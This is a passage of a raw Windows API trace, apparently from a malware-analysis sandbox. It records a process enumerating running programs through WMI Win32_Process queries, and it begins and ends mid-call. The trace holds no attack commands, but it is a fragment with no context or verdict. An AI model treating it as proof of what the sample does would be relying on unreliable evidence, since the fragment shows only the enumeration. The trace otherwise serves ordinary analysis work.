IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.494] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631f28) returned 0x0 [0214.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631f28, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.494] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631f28, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630f58) returned 0x0 [0214.494] WbemDefPath:IUnknown:Release (This=0x5631f28) returned 0x0 [0214.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630f58) returned 0x0 [0214.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.494] WbemDefPath:IUnknown:AddRef (This=0x5630f58) returned 0x3 [0214.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.494] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631f38) returned 0x0 [0214.494] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631f38, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.494] WbemDefPath:IUnknown:Release (This=0x5631f38) returned 0x3 [0214.494] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.495] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.495] WbemDefPath:IUnknown:Release (This=0x5630f58) returned 0x2 [0214.495] WbemDefPath:IUnknown:Release (This=0x5630f58) returned 0x1 [0214.495] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.495] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.495] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630f58, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630f58) returned 0x0 [0214.495] WbemDefPath:IUnknown:AddRef (This=0x5630f58) returned 0x3 [0214.495] WbemDefPath:IUnknown:Release (This=0x5630f58) returned 0x2 [0214.495] WbemDefPath:IWbemPath:SetText (This=0x5630f58, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3060\"") returned 0x0 [0214.495] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.495] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.495] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.495] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.495] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.495] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.495] IWbemClassObject:Get (in: This=0x562eec0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26932ac*=0, plFlavor=0x26932b0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x26932ac*=8, plFlavor=0x26932b0*=0) returned 0x0 [0214.495] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0214.495] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0214.495] IWbemClassObject:Get (in: This=0x562eec0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26932ac*=8, plFlavor=0x26932b0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="active-charge.exe", varVal2=0x0), pType=0x26932ac*=8, plFlavor=0x26932b0*=0) returned 0x0 [0214.496] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0214.496] SysStringByteLen (bstr="active-charge.exe") returned 0x22 [0214.496] CoTaskMemAlloc (cb=0x4) returned 0x5631f68 [0214.496] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631f68, puReturned=0x267acc0 | out: apObjects=0x5631f68*=0x562f058, puReturned=0x267acc0*=0x1) returned 0x0 [0214.543] IUnknown:QueryInterface (in: This=0x562f058, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f058) returned 0x0 [0214.543] IUnknown:QueryInterface (in: This=0x562f058, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.543] IUnknown:QueryInterface (in: This=0x562f058, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.543] IUnknown:AddRef (This=0x562f058) returned 0x3 [0214.544] IUnknown:QueryInterface (in: This=0x562f058, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.544] IUnknown:QueryInterface (in: This=0x562f058, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.544] IUnknown:QueryInterface (in: This=0x562f058, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f05c) returned 0x0 [0214.544] IMarshal:GetUnmarshalClass (in: This=0x562f05c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.544] IUnknown:Release (This=0x562f05c) returned 0x3 [0214.544] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.544] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.544] IUnknown:QueryInterface (in: This=0x562f058, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.544] IUnknown:Release (This=0x562f058) returned 0x2 [0214.544] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.544] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.544] IUnknown:QueryInterface (in: This=0x562f058, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f058) returned 0x0 [0214.544] IUnknown:AddRef (This=0x562f058) returned 0x4 [0214.544] IUnknown:Release (This=0x562f058) returned 0x3 [0214.544] IUnknown:Release (This=0x562f058) returned 0x2 [0214.544] CoTaskMemFree (pv=0x5631f68) [0214.544] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.544] IUnknown:AddRef (This=0x562f058) returned 0x3 [0214.545] IWbemClassObject:Get (in: This=0x562f058, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.545] IWbemClassObject:Get (in: This=0x562f058, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.545] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x66 [0214.545] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x66 [0214.545] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.545] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.545] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.545] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.546] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5631f68) returned 0x0 [0214.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631f68, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.546] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5631f68, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5631038) returned 0x0 [0214.546] WbemDefPath:IUnknown:Release (This=0x5631f68) returned 0x0 [0214.546] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5631038) returned 0x0 [0214.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.547] WbemDefPath:IUnknown:AddRef (This=0x5631038) returned 0x3 [0214.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5631f78) returned 0x0 [0214.547] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5631f78, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.547] WbemDefPath:IUnknown:Release (This=0x5631f78) returned 0x3 [0214.547] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.547] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.547] WbemDefPath:IUnknown:Release (This=0x5631038) returned 0x2 [0214.547] WbemDefPath:IUnknown:Release (This=0x5631038) returned 0x1 [0214.547] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.547] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.547] WbemDefPath:IUnknown:QueryInterface (in: This=0x5631038, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5631038) returned 0x0 [0214.547] WbemDefPath:IUnknown:AddRef (This=0x5631038) returned 0x3 [0214.547] WbemDefPath:IUnknown:Release (This=0x5631038) returned 0x2 [0214.547] WbemDefPath:IWbemPath:SetText (This=0x5631038, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3068\"") returned 0x0 [0214.547] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.548] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.548] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.548] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.548] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.548] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.548] IWbemClassObject:Get (in: This=0x562f058, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2693b30*=0, plFlavor=0x2693b34*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x2693b30*=8, plFlavor=0x2693b34*=0) returned 0x0 [0214.548] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0214.548] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0214.548] IWbemClassObject:Get (in: This=0x562f058, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2693b30*=8, plFlavor=0x2693b34*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ncftp.exe", varVal2=0x0), pType=0x2693b30*=8, plFlavor=0x2693b34*=0) returned 0x0 [0214.548] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0214.548] SysStringByteLen (bstr="ncftp.exe") returned 0x12 [0214.548] CoTaskMemAlloc (cb=0x4) returned 0x5631fa8 [0214.548] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5631fa8, puReturned=0x267acc0 | out: apObjects=0x5631fa8*=0x562f1f0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.609] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562f1f0) returned 0x0 [0214.609] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.609] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.609] IUnknown:AddRef (This=0x562f1f0) returned 0x3 [0214.609] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.609] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.609] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562f1f4) returned 0x0 [0214.609] IMarshal:GetUnmarshalClass (in: This=0x562f1f4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.609] IUnknown:Release (This=0x562f1f4) returned 0x3 [0214.609] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.610] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.610] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.610] IUnknown:Release (This=0x562f1f0) returned 0x2 [0214.610] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.610] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.610] IUnknown:QueryInterface (in: This=0x562f1f0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562f1f0) returned 0x0 [0214.610] IUnknown:AddRef (This=0x562f1f0) returned 0x4 [0214.610] IUnknown:Release (This=0x562f1f0) returned 0x3 [0214.610] IUnknown:Release (This=0x562f1f0) returned 0x2 [0214.610] CoTaskMemFree (pv=0x5631fa8) [0214.610] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.610] IUnknown:AddRef (This=0x562f1f0) returned 0x3 [0214.610] IWbemClassObject:Get (in: This=0x562f1f0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.611] IWbemClassObject:Get (in: This=0x562f1f0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.611] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2072\"") returned 0x66 [0214.611] SysStringByteLen 